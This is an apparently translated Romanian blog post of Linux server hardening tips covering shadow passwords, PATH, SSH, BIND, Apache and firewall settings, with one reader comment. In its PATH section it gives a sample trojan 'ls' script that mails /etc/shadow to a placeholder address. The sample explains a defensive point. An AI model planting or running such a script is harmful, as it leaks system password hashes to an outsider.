Sfaturi de securitate pentru Linux (server) (partea 1)

@Jlcmux

Minute 5

Nu am mai publicat nimic pe blog de mult timp si as vrea sa impartasesc cu voi cateva sfaturi extrase dintr-o carte care, (Printre altele). L-am găsit la Universitate și tocmai l-am citit și deși sincer este un pic învechit și este foarte puțin probabil ca tehnicile prezentate să funcționeze având în vedere evoluția sistemului, sunt totuși aspecte interesante care pot fi arătate. 9788448140502

Vreau să precizez că acestea sunt sfaturi care vizează un sistem Linux care este folosit ca server, la scară medie sau poate mare în condițiile în care la nivel de utilizator desktop, deși pot fi aplicate, nu ar fi foarte utile.

De asemenea, avertizez că sunt pur și simplu sfaturi rapide și nu voi intra în multe detalii, deși am de gând să fac o altă postare mult mai specifică și mai extinsă pe o anumită temă. Dar despre asta voi vedea mai târziu. Să începem.

Politicile de parole. 

Deși poate suna ca un clișeu, a avea o politică bună de parole face diferența între un sistem vulnerabil sau nu. Atacurile precum „forța brută” profită de faptul că au o parolă proastă pentru a accesa un sistem. Cele mai comune sfaturi sunt:

  • Combinați majuscule și minuscule.
  • Folosiți caractere speciale.
  • Numere.
  • Mai mult de 6 cifre (sperăm mai mult de 8).

Pe lângă aceasta, să luăm în considerare două fișiere esențiale.  /etc/passwd și /etc/shadow.

Ceva foarte important este că fișierul / etc / passwd. Pe lângă faptul că ne oferă numele utilizatorului, uid, folderul cale, bash... etc. în unele cazuri, arată și cheia criptată a utilizatorului.

 Să ne uităm la compoziția sa tipică.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

user:cryptkey:uid:gid:path::path:bash

Adevărata problemă aici este că acest fișier are permisiuni -rw-r–r– ceea ce înseamnă că are permisiuni de citire pentru orice utilizator din sistem. iar avand cheia criptata nu este foarte greu sa o descifrezi pe cea reala.

De aceea există fișierul / etc / shadow. Acesta este fișierul în care sunt stocate, printre altele, toate cheile utilizatorului. Acest fișier are permisiunile necesare pentru ca niciun utilizator să nu-l poată citi.

Pentru a remedia acest lucru, trebuie să mergem la fișier / Etc / passwd și schimbați cheia criptată la un „x”, acest lucru va face ca cheia să fie salvată numai în fișierul nostru / etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Probleme cu PATH și .bashrc și altele.

Când un utilizator execută o comandă în consola sa, shell-ul caută acea comandă într-o listă de directoare conținute în variabila de mediu PATH.

Dacă tastați „echo $PATH” în consolă, va apărea ceva de genul acesta.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Fiecare dintre aceste foldere este locul unde shell-ul va căuta comanda scrisă pentru a o executa. El "." Înseamnă că primul folder de căutat este același folder din care este executată comanda.

Să presupunem că există un utilizator „carlos” și acest utilizator dorește „să facă lucruri rele”. Acest utilizator ar putea lăsa un fișier numit „ls” în folderul principal și în acest fișier să execute o comandă ca:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

Și dacă utilizatorul root, din cauza destinului, încearcă să listeze folderele din interiorul folderului Carlos (pentru că mai întâi caută comanda în același folder, fără să-și dea seama, ar trimite fișierul cu parolele la acest e-mail și apoi ar fi listate dosare și nu avea să-și dea seama decât foarte târziu.

Pentru a evita acest lucru, trebuie să eliminăm "." a variabilei PATH.

În același mod, fișierele precum /.bashrc, /.bashrc_profile, ./.login ar trebui să fie auditate și verificați dacă „.” nu există. în variabila PATH și, de fapt, din fișiere ca acesta, puteți schimba destinația unei anumite comenzi.

Sfaturi cu servicii:

SHH

  • Dezactivați versiunea 1 a protocolului ssh în arcvhio sshd_config.
  • Nu permiteți utilizatorului root să se conecteze prin ssh.
  • Fișierele și folderele ssh_host_key, ssh_host_dsa_key și ssh_host_rsa_key ar trebui să fie citite numai de utilizatorul root.

LEGA

  • Schimbați mesajul de bun venit din fișierul named.conf, astfel încât să nu arate numărul versiunii
  • Limitați transferurile de zonă și activați-l numai pentru dispozitivele care au nevoie de el.

Apache

  • Împiedicați serviciul să vă afișeze versiunea în mesajul de bun venit. Editați fișierul httpd.conf și adăugați sau modificați liniile:  

ServerSignature Off
ServerTokens Prod

  • Dezactivați indexarea automată
  • Configurați Apache pentru a nu servi fișiere sensibile precum .htacces, *.inc, *.jsp.. etc.
  • Ștergeți paginile de manual sau exemple din serviciu
  • Rulați Apache într-un mediu chroot

Securitatea retelei.

Este esențial să acoperiți toate intrările posibile în sistemul dvs. din rețeaua externă, mai jos sunt câteva sfaturi esențiale pentru a preveni intrușii să scaneze și să obțină informații din rețeaua dvs.

Blocați traficul ICMP

Firewall-ul trebuie configurat pentru a bloca toate tipurile de trafic ICMP de intrare și de ieșire și răspunsuri eco. Cu aceasta, împiedicați, de exemplu, un scanner care caută dispozitive live într-un interval IP să vă localizeze. 

Evitați scanarea ping TCP.

O modalitate de a vă scana sistemul este scanarea ping TCP. Să presupunem că pe serverul tău există un server Apache pe portul 80. Intrusul ar putea trimite o cerere ACK către portul respectiv, cu aceasta, dacă sistemul răspunde, se va confirma că computerul este în viață și va scana restul portului .

Pentru aceasta, firewall-ul dumneavoastră ar trebui să aibă întotdeauna opțiunea „conștient de stat” și ar trebui să renunțe la toate pachetele ACK care nu corespund unei conexiuni sau sesiuni TCP deja stabilite.

Câteva sfaturi suplimentare:

  • Utilizați sistemele IDS pentru a detecta scanările de porturi în rețeaua dvs.
  • Configurați firewall pentru a nu avea încredere în valorile portului sursă de conexiune.

Acest lucru se datorează faptului că unele scanări folosesc un port de origine „fals”, cum ar fi 20 sau 53, deoarece multe sisteme se bazează pe aceste porturi, deoarece sunt tipice pentru FTP sau DNS.

NOTĂ: Amintiți-vă că majoritatea problemelor indicate în această postare au fost deja rezolvate în aproape toate distribuțiile actuale. Dar nu strică niciodată să ai informații cheie despre aceste inconveniente, astfel încât să nu vi se întâmple.

NOTĂ: Mai târziu mă voi uita la un anumit subiect și voi face o postare cu informații mult mai detaliate și mai actuale.

Multumesc tuturor pentru lectura.

Salutări.


Lasă comentariul tău

Adresa ta de email nu va fi publicată. Câmpurile obligatorii sunt marcate cu *

*

*

  1. Responsabil pentru date: Miguel Ángel Gatón
  2. Scopul datelor: Control SPAM, gestionarea comentariilor.
  3. Legitimare: consimțământul dvs.
  4. Comunicarea datelor: datele nu vor fi comunicate terților decât prin obligație legală.
  5. Stocarea datelor: bază de date găzduită de Occentus Networks (UE)
  6. Drepturi: în orice moment vă puteți limita, recupera și șterge informațiile.

  1.   informatic el a spus
    hace Ani 8

    Mi-a plăcut foarte mult articolul și mă interesează subiectul, vă încurajez să continuați să încărcați conținut.

    Răspunde la IT